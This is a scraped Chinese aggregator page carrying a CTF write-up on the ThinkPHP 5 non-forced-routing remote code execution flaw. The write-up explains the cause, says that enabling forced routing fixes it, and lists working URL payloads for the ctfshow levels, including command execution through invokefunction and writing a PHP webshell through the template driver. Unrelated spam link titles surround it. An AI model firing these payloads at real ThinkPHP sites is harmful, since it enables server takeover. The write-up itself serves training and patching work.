当前位置: 首页 > news >正文

网站黑名单查询福清seo

网站黑名单查询,福清seo,重庆做网站及公众号公司,文明网站建设方案及管理制度目录 非强制路由RCE漏洞 web579 web604 web605 web606 web607-610 前面审了一些tp3的sql注入,终于到tp5了,要说tp5那最经典的还得是rce 下面介绍非强制路由RCE漏洞 非强制路由RCE漏洞原理 非强制路由相当于开了一个大口子,可以任意调用当前框…

目录

非强制路由RCE漏洞

web579 

web604 

web605 

web606

web607-610


前面审了一些tp3的sql注入,终于到tp5了,要说tp5那最经典的还得是rce

下面介绍非强制路由RCE漏洞

非强制路由RCE漏洞原理

非强制路由相当于开了一个大口子,可以任意调用当前框架中的任意类的任意方法并传参。

下面是该漏洞的利用条件:

 

要修复这个漏洞非常简单,启用强制路由即可

很简单的道理,举个例子

index模块下控制器定义一个Address类,类里定义一个search()方法,并定义响应的路由访问+传参。

 

可以/search/5/4访问并传参

 

 因为没有开启强制路由,所以下面这种方式可以达成一样的效果

?s=index/Address/search&id=5&uid=4 

 

而且当前框架中的任意类的任意方法都是可以被直接调用的,所以我们只要找到恶意类的恶意方法传参即可,试着拿一个payload弹一个计算器,成功。

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=calc

ok我们已经实现了从0到1的突破了,剩下的就是各种payload的积累

从payload反推是很容易的,下面不再演示

贴出一篇文章

ThinkPHP5框架缺陷导致远程命令执行 

先介绍一个通杀解:

利用\think\view\driver\Think类的__call方法

?s=index/\think\view\driver\Think/__call&method=display&params[]=<?php system('tac /f*'); ?>

web579 

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /f*

web604 

?s=index/\think\Request/input&filter[]=system&data=tac /f*

web605 

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php system('tac /f*');?>

web606

invokefunction大写即可

?s=index/think\app/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /f*

或者:

?s=index/\think\Container/invokeFunction&function=assert&vars[0]=system('tac /f*');

web607-610

?s=index/\think\view\driver\Think/__call&method=display&params[]=<?php system('tac /f*'); ?>
http://www.yayakq.cn/news/880279/

相关文章:

  • 公司的网站备案手续青海省建设监理协会网站
  • 潍坊知名网站建设做的比较好的国外网站一级页面布局分析
  • 怎么建设两个大淘客网站苏州机械加工网
  • django商城网站开发的功能大连网络营销网站
  • 智能营销型网站wordpress信息分类主题
  • 吉林网站建设平台5网站开发
  • 免费站推广网站2022济宁市城市建设局网站
  • 温州做网站多少钱谷歌网站推广公司
  • 建网站问题大公司网页设计用什么软件好
  • 重庆学校网站建设柯桥建设集团网站
  • 无锡网站备案哪些网站专做自媒体的
  • 做网站需要什么手续资料网站做浮动边框asp代码
  • 知名的中文域名网站有哪些网络设计基本原则
  • 5设计网站工商注册咨询电话多少
  • 辽宁智能建站系统价格站长工具seo客户端
  • 网站备案幕布 下载常德论坛网
  • 怎样在建立公司网站企业查名
  • 网站建设 职责企业中层管理人员培训课程
  • 北京网站建设好wordpress 改网址导航
  • 自己怎么建设一个网站手表二级市场网站
  • 微网站定制wordpress评论编辑器
  • flash类网站开发杭州十大跨境电商排名
  • 建设龙卡e付卡网站基于h5的wap网站开发
  • 怎么利用网站做淘宝客卖货平台有哪些
  • wep购物网站开发模板德州做网站公司排行
  • 计算机培训中心网站做企业展示网站需要多少钱
  • 蓝色高科技网站模板常州网站公司
  • 网站设计公司网站制作企业网站建设模板多少钱
  • 企业网站剖析中国万网注册网站
  • 网站最好的优化是什么英文学习网站